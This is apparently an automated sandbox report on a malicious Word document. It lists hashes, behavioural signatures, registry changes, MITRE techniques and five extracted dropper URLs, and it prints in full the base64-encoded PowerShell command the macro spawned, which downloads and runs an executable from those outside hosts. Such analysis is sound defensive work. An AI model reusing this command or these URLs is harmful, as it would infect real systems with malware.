58b4019b5b5bee18e910424744e4b98793ed962b3642a15f00f9d16f6d2d8e23

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20-09-2024 23:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eea6bab29a2c5672788810b8153e65ae_JaffaCakes118.doc
Size

228KB
MD5

eea6bab29a2c5672788810b8153e65ae
SHA1

9eb6e475fc9f509488d0270e087824ef18ab74dd
SHA256

58b4019b5b5bee18e910424744e4b98793ed962b3642a15f00f9d16f6d2d8e23
SHA512

50ee14b08f4c1fed93f1464d84b802963c6ef6f4b623360ec839981bb3167895c612f4b33dbe86259e043aa88d5f6fbe76020eaa256de3eda970969a2763bc2e
SSDEEP

3072:Sj6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkeMeGYGdSyRwn0dRs:SHgtEWPsL/aTyT9Gke1GYGzRwncRs

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://si-morgh.com/wp-includes/brMYT734/

exe.dropper

http://nlfgo.com/wp-admin/4d2WC234123/

exe.dropper

http://vip.5k6k.com/cs5h/aoX8wY2/

exe.dropper

http://esenlerdugunsalonu.com/wp-includes/uCzyiZSkg/

exe.dropper

http://aeasinos.com.br/images/5ROM44/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2944	2752	powersheLL.exe	30

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2944	powersheLL.exe
10	2944	powersheLL.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\TypeLib\{D8BD7B71-82BA-4BB9-A2B4-616622B53968}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8BD7B71-82BA-4BB9-A2B4-616622B53968}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8BD7B71-82BA-4BB9-A2B4-616622B53968}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\TypeLib\{D8BD7B71-82BA-4BB9-A2B4-616622B53968}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8BD7B71-82BA-4BB9-A2B4-616622B53968}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1832	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2944	powersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2944	powersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1832	WINWORD.EXE
1832	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1832 wrote to memory of 308	1832	WINWORD.EXE	35
PID 1832 wrote to memory of 308	1832	WINWORD.EXE	35
PID 1832 wrote to memory of 308	1832	WINWORD.EXE	35
PID 1832 wrote to memory of 308	1832	WINWORD.EXE	35

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eea6bab29a2c5672788810b8153e65ae_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1832
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:308

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABCAF8AdQA0ADcAdwBkAD0AJwBRAHUAYwB1AGIAegA4ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAEMAdQBSAGAAaQBUAHkAUABSAE8AdABgAE8AQwBPAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABFADMAMAAyAGQAOQBxACAAPQAgACcAUQB6AHIAYQAnADsAJABQAGcAZAAzAHEANgA1AD0AJwBDADMAegBlAHcAZgBsACcAOwAkAFQAMQBhAF8ANgBwADUAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXAAnACsAJABFADMAMAAyAGQAOQBxACsAJwAuAGUAeABlACcAOwAkAEwAagBlAGYAdwA2AG0APQAnAEkAagBuAHIANgBtADMAJwA7ACQAUQBiAHoAMwBqAHYAZwA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAQgBDAEwAaQBlAE4AVAA7ACQARQBrAGkAYQAxAGMAcwA9ACcAaAB0AHQAcAA6AC8ALwBzAGkALQBtAG8AcgBnAGgALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGIAcgBNAFkAVAA3ADMANAAvACoAaAB0AHQAcAA6AC8ALwBuAGwAZgBnAG8ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADQAZAAyAFcAQwAyADMANAAxADIAMwAvACoAaAB0AHQAcAA6AC8ALwB2AGkAcAAuADUAawA2AGsALgBjAG8AbQAvAGMAcwA1AGgALwBhAG8AWAA4AHcAWQAyAC8AKgBoAHQAdABwADoALwAvAGUAcwBlAG4AbABlAHIAZAB1AGcAdQBuAHMAYQBsAG8AbgB1AC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB1AEMAegB5AGkAWgBTAGsAZwAvACoAaAB0AHQAcAA6AC8ALwBhAGUAYQBzAGkAbgBvAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8ANQBSAE8ATQA0ADQALwAnAC4AIgBzAHAAbABgAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFkAOAA1ADcANwA0AG4APQAnAFUAZgBiADYANwAwADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAYwB1AG8ANQBhAGMAIABpAG4AIAAkAEUAawBpAGEAMQBjAHMAKQB7AHQAcgB5AHsAJABRAGIAegAzAGoAdgBnAC4AIgBkAE8AdwBgAE4ATABPAGAAQQBEAGYASQBMAGUAIgAoACQAQgBjAHUAbwA1AGEAYwAsACAAJABUADEAYQBfADYAcAA1ACkAOwAkAEoAYgBoADEAdAA3ADkAPQAnAFYANQBwAGcAcwBtAGQAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUADEAYQBfADYAcAA1ACkALgAiAEwAZQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMwA1ADMAOAA1ACkAIAB7AC4AKAAnAEkAbgAnACsAJwB2ACcAKwAnAG8AJwArACcAawBlAC0ASQB0AGUAbQAnACkAKAAkAFQAMQBhAF8ANgBwADUAKQA7ACQARwBnAHoAbQBxAF8AeQA9ACcAQwBuAHEANQBzAG8AbwAnADsAYgByAGUAYQBrADsAJABMAGQANQBmAGMAOABiAD0AJwBDAGIAYgBuAGcAdQBxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcANgB3ADMAagB1ADkAPQAnAE8ANABwAHQAcgA4AG0AJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
adb4bd9d811bb05fe1d5dba65941a9e5

SHA1
a3ed4258fa8ff38489bcb4c7d0f32fa25a45f011

SHA256
5e98cfdbe23f7788d32adb9ff8e3dee1125b62be67369e63f63806456ee51d5b

SHA512
edbdac9687175517aaf5f888fe1bff8701bc8b57a4b788c63543726576d1e01ec10d4946ece6ec52935367f63fe766dcfd6f44dc1107ecc9ba4d655334be25fc

Download Submit
memory/1832-26-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-42-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-5-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-7-0x0000000005CF0000-0x0000000005DF0000-memory.dmp

Filesize
1024KB

Download
memory/1832-6-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-11-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-12-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-10-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-9-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-8-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-15-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-14-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-13-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-27-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-16-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-19-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-22-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-20-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1832-2-0x00000000717DD000-0x00000000717E8000-memory.dmp

Filesize
44KB

Download
memory/1832-17-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-25-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-24-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-23-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-32-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-31-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-29-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-28-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-30-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-33-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-62-0x00000000717DD000-0x00000000717E8000-memory.dmp

Filesize
44KB

Download
memory/1832-18-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-41-0x00000000717DD000-0x00000000717E8000-memory.dmp

Filesize
44KB

Download
memory/1832-0-0x000000002FCA1000-0x000000002FCA2000-memory.dmp

Filesize
4KB

Download
memory/1832-43-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-44-0x00000000004F0000-0x00000000005F0000-memory.dmp

Filesize
1024KB

Download
memory/1832-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2944-40-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2944-39-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download